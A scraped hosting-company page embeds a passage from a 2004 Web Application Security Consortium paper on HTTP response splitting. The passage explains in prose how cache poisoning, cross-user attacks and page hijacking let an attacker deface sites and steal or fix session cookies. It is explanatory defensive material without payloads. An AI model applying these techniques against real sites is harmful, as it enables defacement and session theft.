Discount Web Hosting Application Security Consortium Discount Hosting

the clients use IE unless all the location headers can be

controlled. This attack makes it possible.

   Web Cache Poisoning (defacement): This is a new attack. The

attacker simply forces the target (i.e. a cache server of some

sort   the attack was verified on Squid 2.4, NetCache 5.2,

Apache Proxy 2.0 and few other cache servers) to cache the

second response in response to the second request. An

example is to send a second request to

 http://web.site/index.html , and force the target (cache server)

to cache the second response that is fully controlled by the

attacker. This is effectively a defacement of the web site, at

least as experienced by other clients, who use the same cache

server. Of course, in addition to defacement, an attacker can

steal session cookies, or  fix  them to a predetermined value.

   Cross User attacks (single user, single page, temporary

defacement: As a variant of the attack, it is possible for the

attacker not to send the second request. This seems odd at first,

but the idea is that in some cases, the target may share the

same TCP connection with the server, among several users

(this is the case with some cache servers). The next user to

send a request to the web server through the target will be

served by the target with the second response the attacker

generated. The net result is having a client of the web site being

served with a resource that was crafted by the attacker. This

enables the attacker to  deface  the site for a single page

requested by a single user (a local, temporary defacement).

Much like the previous item, in addition to defacement, the

attacker can steal session cookies and/or set them.

   Hijacking pages with user specific information: With this attack,

it is possible for the attacker to receive the server response to a

user request instead of the user. Therefore, the attacker gains

access to user specific information that may be sensitive and

confidential.

   Browser cache poisoning: This is a special case of  Web Cache

Poisoning  (verified on IE 6.0). It is somewhat similar to XSS in

the sense that in both the attacker needs to target individual

Copyright 2004, Web Application Security Consortium. All rights reserved.





Unlimited Web Hosting





  
    
      
        Home :: RegularHostingPlan :: 
          DatabaseHostingPlan :: 
          JavaHostingPlan :: 
          CompareOurPlans :: AboutUs - 
          Our Network :: 
          Testimonials 
          WhyChooseTotalRoute.net :: 
          MoneyBackQuarantee :: 
          SupportOnline :: FAQ :: 
          ControlPanel :: 
          24/7TechSupport :: 
          ContactUs :: 
          Order 
          TransferYourSite :: 
          Sitemap :: 
            TermsOfService
      Discount Web Hosting 
    
  
  
    
 
  
  
    Our partners:Jsp Web   Hosting 
      Unlimited Web Hosting 
      Cheapest Web   Hosting  Java Web Hosting 
      Web   Templates 
      Best Web Templates 
      Web Design   Templates 
      Interland Web Hosting 
      Cheap Web Hosting  
      Java Web Hosting   
      Tomcat Web Hosting 
      Quality Web   Hosting 
    Best Web Hosting  Mac Web   Hosting
  
  
    TotalRoute.net Business web hosting division of Vision Web Hosting Inc. All rights reserved.